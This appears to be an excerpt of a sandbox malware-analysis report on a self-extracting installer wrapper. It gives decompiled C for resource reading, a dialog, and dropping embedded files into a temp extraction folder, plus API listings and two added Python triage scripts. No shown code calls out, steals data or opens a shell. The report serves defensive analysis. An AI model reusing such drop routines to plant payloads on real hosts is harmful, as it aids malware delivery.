										/* Advance to the next 0x3c-byte table entry. */
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										/* VS_FIXEDFILEINFO: +8 = dwFileVersionMS, +0xc = dwFileVersionLS. */
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										/* Compare the file version against the two bound pairs stored in the entry. */
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00172A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00172A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}


































APIs
• GlobalFree.KERNEL32 ref: 00172A6F
  • Part of subcall function 00172773: CharUpperA.USER32(4FFA21AA,00000000,00000000,00000000), ref: 001727A8
  • Part of subcall function 00172773: CharNextA.USER32(0000054D), ref: 001727B5
  • Part of subcall function 00172773: CharNextA.USER32(00000000), ref: 001727BC
  • Part of subcall function 00172773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172829
  • Part of subcall function 00172773: RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172852
  • Part of subcall function 00172773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172870
  • Part of subcall function 00172773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001728A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00173938,?,?,?,?,-00000005), ref: 00172958
• GlobalLock.KERNEL32 ref: 00172969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00173938,?,?,?,?,-00000005,?), ref: 00172A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00172A81
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID:
• API String ID: 3949799724-0
• Opcode ID: 723e359cb014dac24d9e27c77b9eb14ae9a797418e66f75c65daa75b5f4e097a
• Instruction ID: c29f7503b61d031b148ce7e67147258389b4747e9237d84ea0de07e63cf31bf6
• Opcode Fuzzy Hash: 723e359cb014dac24d9e27c77b9eb14ae9a797418e66f75c65daa75b5f4e097a
• Instruction Fuzzy Hash: 1A510C31D00219DFCF25DF98D884AAEFBB5FF88700F14816AE919E3651D7319942DB91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 32%
		E00174169(void* __eflags) {
			int _t18;
			void* _t21;

			_t20 = E0017468F("FINISHMSG", 0, 0);
			_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
			if(_t21 != 0) {
				if(E0017468F("FINISHMSG", _t21, _t20) != 0) {
					if(lstrcmpA(_t21, "<None>") == 0) {
						L7:
						return LocalFree(_t21);
					}
					_push(0);
					_push(0x40);
					_push(0);
					_push(_t21);
					_t18 = 0x3e9;
					L6:
					E001744B9(0, _t18);
					goto L7;
				}
				_push(0);
				_push(0x10);
				_push(0);
				_push(0);
				_t18 = 0x4b1;
				goto L6;
			}
			return E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
		}





Instruction addresses (per-line gutter of the listing above): 0x0017417d 0x0017418f 0x00174193 0x001741b7 0x001741d3 0x001741e6 0x00000000 0x001741e7 0x001741d5 0x001741d6 0x001741d8 0x001741d9 0x001741da 0x001741df 0x001741e1 0x00000000 0x001741e1 0x001741b9 0x001741ba 0x001741bc 0x001741bd 0x001741be 0x00000000 0x001741be 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001730B4), ref: 00174189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001730B4), ref: 001741E7
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: 3f6faa84b103c61ff8c17207fbd877293f190298ae8eba1baf218a6b4195542d
                                                                                                                                                                                                    • Instruction ID: 970a44555bce1687e409dd6769d1c2d0c5ada9ade04298364e71cce93bd23a29
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6faa84b103c61ff8c17207fbd877293f190298ae8eba1baf218a6b4195542d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301F4F13402243BF32426694C96F7B21BEDFE5795F91C025B70EE15809B68DC8141B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
			E001719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				// Dialog procedure: _a4 = hDlg, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
				signed int _v8;              // /GS stack cookie slot
				char _v520;                  // start of a 0x200-byte text buffer that ends just below the cookie
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t32;                  // missing from the decompiler's declarations; holds the desktop HWND or wParam below
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x178004; // 0x4ffa21aa, the MSVC /GS security cookie
				_v8 = _t11 ^ _t35; // cookie XOR ebp, re-checked by the epilogue E00176CE0
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {    // uMsg == 0x110 (WM_INITDIALOG)
					_t32 = GetDesktopWindow();
					E001743D0(_t34, _t15);  // _t15 is the decompiler's name for the GetDesktopWindow() result (eax); called with the dialog and desktop handles
					_v520 = 0;
					LoadStringA( *0x179a3c, _a16,  &_v520, 0x200);  // hInstance from a global; the string ID arrives as the WM_INITDIALOG lParam
					SetDlgItemTextA(_t34, 0x83f,  &_v520);          // control ID 2111 gets the loaded text
					MessageBeep(0xffffffff);                        // simple beep
					goto L6;
				} else {
					if(_t14 != 1) {   // anything other than 0x111 (WM_COMMAND) is left unhandled
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;  // wParam: the command / control ID
						if(_t32 - 0x83d > 1) {   // only IDs 0x83d and 0x83e (2109, 2110) are meant to close the dialog
							goto L4;
						} else {
							EndDialog(_t34, _t32);   // the control ID becomes the DialogBox return value
							L6:
							_t23 = 1;
						}
					}
				}
				return E00176CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);  // returns 1 (handled) or 0; epilogue verifies the cookie
			}

Instruction addresses (per-line gutter of the listing above): 0x001719e0 0x001719e0 0x001719eb 0x001719f2 0x001719f9 0x001719fc 0x00171a01 0x00171a2a 0x00171a2e 0x00171a3e 0x00171a4f 0x00171a62 0x00171a6a 0x00000000 0x00171a03 0x00171a06 0x00171a20 0x00171a20 0x00171a08 0x00171a08 0x00171a14 0x00000000 0x00171a16 0x00171a18 0x00171a70 0x00171a72 0x00171a72 0x00171a14 0x00171a06 0x00171a81

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00171A18
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00171A24
                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00171A4F
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00171A62
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00171A6A
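The two "APIs" listings on this page (the resource-reading function above and this dialog procedure) follow one line shape: an optional "Part of subcall function ADDR:" prefix, Api.MODULE, an optional argument list, and the call-site address after "ref:". The parser below is an added example, not Joe Sandbox code or part of the report: it turns such lines into records, groups each call under the function that issues it, names the resource type requested by FindResourceA (0xA here is RT_RCDATA) and splits the uType of MessageBoxA (00010010 here) into its MB_* flags. The sample lines are constructed copies of lines from the listings above; the record layout, the helper names and the reading of "?" as an argument the decompiler could not resolve are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the shape of the "APIs" listings above (a subset of their lines).
SAMPLE_LISTING = """\
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
  • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
• LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001730B4), ref: 00174189
• LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001730B4), ref: 001741E7
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
• GetDesktopWindow.USER32 ref: 00171A24
• MessageBeep.USER32(000000FF), ref: 00171A6A
"""

# One bullet: optional "Part of subcall function ADDR:", then Api.MODULE, an optional
# "(arg,arg,...)" list, then "ref: ADDR". Assumption: "?" is an argument the decompiler
# could not resolve; 8 hex digits are a value; anything else is a resolved literal.
LINE_RE = re.compile(
    r"""^\s*[•*-]?\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]+):\s*)?
        (?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[object, ...]    # int for hex values, None for "?", str for literals
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # nested function that makes the call, None if direct

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok

def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' section into ApiCall records."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw = m.group("args")
        args = tuple(_parse_arg(t) for t in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

def apis_by_function(calls: List[ApiCall]) -> Dict[Optional[int], List[str]]:
    """Group API names under the function that issues them (None = the listed function)."""
    groups: Dict[Optional[int], List[str]] = {}
    for c in calls:
        groups.setdefault(c.subcall_of, []).append(c.api)
    return groups

# Standard Win32 resource type ordinals (winuser.h RT_* values).
RT_NAMES = {1: "RT_CURSOR", 2: "RT_BITMAP", 3: "RT_ICON", 4: "RT_MENU", 5: "RT_DIALOG",
            6: "RT_STRING", 9: "RT_ACCELERATOR", 10: "RT_RCDATA", 11: "RT_MESSAGETABLE",
            14: "RT_GROUP_ICON", 16: "RT_VERSION", 24: "RT_MANIFEST"}

def resource_lookups(calls: List[ApiCall]) -> List[Tuple[object, object]]:
    """(lpName, resource type) for each FindResourceA/W(hModule, lpName, lpType) call."""
    out = []
    for c in calls:
        if c.api in ("FindResourceA", "FindResourceW") and len(c.args) == 3:
            rtype = c.args[2]
            out.append((c.args[1], RT_NAMES.get(rtype, rtype) if isinstance(rtype, int) else rtype))
    return out

# MessageBox uType fields (winuser.h MB_* values).
MB_BUTTONS = {0: "MB_OK", 1: "MB_OKCANCEL", 2: "MB_ABORTRETRYIGNORE", 3: "MB_YESNOCANCEL",
              4: "MB_YESNO", 5: "MB_RETRYCANCEL", 6: "MB_CANCELTRYCONTINUE"}
MB_ICONS = {0x10: "MB_ICONHAND", 0x20: "MB_ICONQUESTION", 0x30: "MB_ICONEXCLAMATION", 0x40: "MB_ICONASTERISK"}
MB_MODAL = {0x1000: "MB_SYSTEMMODAL", 0x2000: "MB_TASKMODAL"}
MB_OPTIONS = {0x10000: "MB_SETFOREGROUND", 0x40000: "MB_TOPMOST", 0x200000: "MB_SERVICE_NOTIFICATION"}

def decode_messagebox_flags(utype: int) -> List[str]:
    """Split a MessageBox uType into its button, icon, modality and option names."""
    names = [MB_BUTTONS.get(utype & 0xF, f"buttons 0x{utype & 0xF:x}")]
    if (utype & 0xF0) in MB_ICONS:
        names.append(MB_ICONS[utype & 0xF0])
    if (utype & 0x3000) in MB_MODAL:
        names.append(MB_MODAL[utype & 0x3000])
    names += [n for bit, n in sorted(MB_OPTIONS.items()) if utype & bit]
    return names

def messagebox_styles(calls: List[ApiCall]) -> List[Tuple[int, List[str]]]:
    """(call-site address, decoded uType) for each MessageBoxA/W whose uType is known."""
    return [(c.ref, decode_messagebox_flags(c.args[3])) for c in calls
            if c.api in ("MessageBoxA", "MessageBoxW") and len(c.args) == 4
            and isinstance(c.args[3], int)]

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE_LISTING)
    for fn, names in apis_by_function(parsed).items():
        print("direct" if fn is None else f"via {fn:08X}", "->", ", ".join(names))
    print("resources:", resource_lookups(parsed))
    for ref, flags in messagebox_styles(parsed):
        print(f"MessageBox at {ref:08X}: {' | '.join(flags)}")
```

Run against the full listings on this page, the grouping separates what the function itself calls (LocalAlloc/LocalFree, the dialog APIs) from what its helpers do (the FindResource/LoadResource/LockResource/memcpy_s chain in 0017468F, the LoadStringA/MessageBoxA pair in 001744B9), which is the split a triager wants before reading the decompiled bodies.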
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                    • Opcode ID: 38784b94e4e9e3acc735743b437eac10c331ce6348b73412aa508de7bf4104e2
                                                                                                                                                                                                    • Instruction ID: e0e99fbda5b0c1001da000561399de6c03902d0450dd548985e8780e0fac0155
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38784b94e4e9e3acc735743b437eac10c331ce6348b73412aa508de7bf4104e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A211A131501159AFEB10EF68DD08AAE77B8EF89301F908164F91A97590DB309EC1CB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
			// Drop routine of the self-extracting wrapper: builds "<extraction dir>\<name>" and writes one
			// embedded file to it. From the way the arguments are used: _a4 = byte count, _a12 = file name,
			// _a16 = payload buffer. Returns 1 on success, 0 on failure (with a global HRESULT slot set).
			E001763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;           // stack cookie copy
				char _v268;               // path buffer, 0x104 = MAX_PATH bytes
				long _v272;               // bytes written by WriteFile
				void* _v276;              // payload buffer (copy of _a16)
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x178004; // 0x4ffa21aa
				_v8 = _t15 ^ _t40;        // global cookie XOR frame pointer: the /GS stack-protector pattern (inference)
				_v272 = _v272 & 0x00000000;   // bytes written = 0
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;                 // result flag, set to 0 on any failure below
				// Copy the extraction directory into the MAX_PATH buffer, then append the file name (_a12).
				// The decompiler inlined the directory string as seen at run time (sandbox user "hardz");
				// the API trace below shows the same path with the user name normalised to "user".
				E00171781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E0017658A( &_v268, 0x104, _a12);
				_t28 = 0;
				// CreateFileA(path, GENERIC_WRITE (0x40000000), no sharing, NULL, CREATE_ALWAYS (2),
				//             FILE_ATTRIBUTE_NORMAL (0x80), NULL)
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {  // INVALID_HANDLE_VALUE
					_t28 = _a4;
					// Failed or short write: record 0x80070052 = HRESULT_FROM_WIN32(ERROR_CANNOT_MAKE, 82)
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x179124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x179124 = 0x80070052;  // same error code when the file cannot be created
					_t37 = 0;
				}
				// E00176CE0 receives the cookie (_v8 ^ _t40) and the result flag; given the prologue above it is
				// most likely the __security_check_cookie epilogue that then returns _t37 (inference).
				return E00176CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

Line addresses: 0x001763cb, 0x001763d2, 0x001763d8, 0x001763ea, 0x001763f3, 0x00176401, 0x00176402, 0x00176410, 0x00176415, 0x00176433, 0x00176438, 0x00176449, 0x00176463, 0x0017646d, 0x00176477, 0x00176477, 0x0017647a, 0x0017643a, 0x0017643a, 0x00176444, 0x00176444, 0x00176492

APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017647A
Strings
• C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 001763EB
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1065093856-2312194364
• Opcode ID: 2ebdc28f70baf3e275527dd26cc7c24ceaf1d113c13eb15f615173a71e97e2a0
• Instruction ID: 32107deb5b116031b83489e576d9d22c1a6b79727e4bb522a0145bfc3892da1b
• Opcode Fuzzy Hash: 2ebdc28f70baf3e275527dd26cc7c24ceaf1d113c13eb15f615173a71e97e2a0
• Instruction Fuzzy Hash: 3821D571A00218ABDB10DF25DC85FEB7778EB98314F0081A9F589A3180DBB05DC58F64
Uniqueness
Uniqueness Score: -1.00%
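The routine above is the wrapper's drop step: every embedded file is written to C:\Users\<user>\AppData\Local\Temp\IXP000.TMP\ with CreateFileA/WriteFile, and a failure leaves HRESULT 0x80070052 (ERROR_CANNOT_MAKE) in a global slot. For a responder the useful check is whether such extraction directories exist on a host and what landed in them. The Python script below is an added example, not code from the report or from the sample: it assumes the wextract/IExpress convention that extraction directories are named IXP plus three digits and .TMP (only IXP000.TMP appears in the report; the numbering pattern is an assumption), hashes every file found there, flags PE images by their MZ/PE headers, and builds its own constructed stand-in for %TEMP% so it runs offline.

```python
import hashlib
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import List

# wextract/IExpress extraction directories are named IXP000.TMP, IXP001.TMP, ...
# (assumption: the three-digit numbering; the report only shows IXP000.TMP).
IXP_DIR_RE = re.compile(r"^IXP\d{3}\.TMP$", re.IGNORECASE)


@dataclass
class DroppedFile:
    path: str
    size: int
    sha256: str
    is_pe: bool


def is_pe(data: bytes) -> bool:
    """Cheap PE check: an 'MZ' stub and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def scan_temp(temp_root) -> List[DroppedFile]:
    """Walk temp_root for IXP###.TMP directories and hash every file inside them."""
    hits: List[DroppedFile] = []
    for entry in sorted(Path(temp_root).iterdir()):
        if not (entry.is_dir() and IXP_DIR_RE.match(entry.name)):
            continue
        for f in sorted(p for p in entry.rglob("*") if p.is_file()):
            data = f.read_bytes()
            hits.append(DroppedFile(str(f), len(data),
                                    hashlib.sha256(data).hexdigest(), is_pe(data)))
    return hits


def build_fixture(temp_root) -> None:
    """Constructed stand-in for %TEMP% (not real sample data): one drop directory
    holding a minimal PE image and a text file, plus an unrelated file to ignore."""
    drop = Path(temp_root) / "IXP000.TMP"
    drop.mkdir(parents=True, exist_ok=True)
    pe = bytearray(0x100)
    pe[:2] = b"MZ"
    pe[0x3C:0x40] = (0x80).to_bytes(4, "little")   # e_lfanew -> 0x80
    pe[0x80:0x84] = b"PE\0\0"
    (drop / "payload.exe").write_bytes(bytes(pe))
    (drop / "settings.ini").write_bytes(b"[Settings]\r\n")
    (Path(temp_root) / "unrelated.txt").write_bytes(b"nothing to see")


def run_demo() -> List[DroppedFile]:
    """Build the fixture in a throwaway directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_temp(tmp)


if __name__ == "__main__":
    # On a live host, call scan_temp() on the user's %TEMP% directory instead.
    for hit in run_demo():
        print(f"{'PE ' if hit.is_pe else '   '} {hit.size:6d} {hit.sha256[:16]}... {hit.path}")
```

The SHA-256 of each dropped file is what you pivot on (the report's own hashes for file.exe are in the header), and rglob also catches payloads nested one level deeper than the IXP directory itself. The PE check is deliberately minimal; it only tells you which drops deserve a full parse.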

C-Code - Quality: 100%
			// Records a string (__ecx) in a global singly-linked list headed at *0x1791e0: allocates an
			// 8-byte node { char* copy; node* next }, duplicates the string, and pushes the node at the head.
			// Returns 1 on success, 0 if either allocation fails (after reporting the error).
			E001747E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;                              // input string
				_t34 = LocalAlloc(0x40, 8);                // 0x40 = LMEM_FIXED | LMEM_ZEROINIT, one 8-byte node
				if(_t34 != 0) {
					// Inlined strlen: after the loop, _t22 - _t27 + 1 is the length including the NUL terminator.
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);   // buffer for the string copy
					 *_t34 = _t24;                               // node->copy
					if(_t24 != 0) {
						// Second inlined strlen, then E00171680(dest, count, src) copies the bytes
						// (a memcpy-style routine, inferred from its use here).
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00171680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x1791e0; // 0x33c7230          current list head
						 *(_t34 + 4) = _t11;                     // node->next = old head
						 *0x1791e0 = _t34;                       // head = node
						return 1;
					}
					// String copy failed: report the error, free the node, return 0. E001744B9 looks like a
					// message-box helper (owner window *0x178584, string id 0x4b5, flags 0x10 = MB_ICONHAND);
					// _t8 is a temporary the decompiler left unresolved.
					_t25 =  *0x178584; // 0x0
					E001744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				// Node allocation failed: same error report (_t5 likewise unresolved), then return 0 via L2.
				_t26 =  *0x178584; // 0x0
				E001744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
                                                                                                                                                                                                    			}

APIs
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00174E6F), ref: 001747EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00174823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00174847
  • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
Strings
• C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00174851
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Local$Alloc$FreeLoadMessageString
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 359063898-2312194364
• Opcode ID: 75c61288233b25aa0aed7c061391d7cafa7e163cafe152b6a21516098911f9ae
• Instruction ID: 35f8f0e5039c221ae616e6179a40defd10eac9fb8420a6cdcae87a8c547cab9d
• Opcode Fuzzy Hash: 75c61288233b25aa0aed7c061391d7cafa7e163cafe152b6a21516098911f9ae
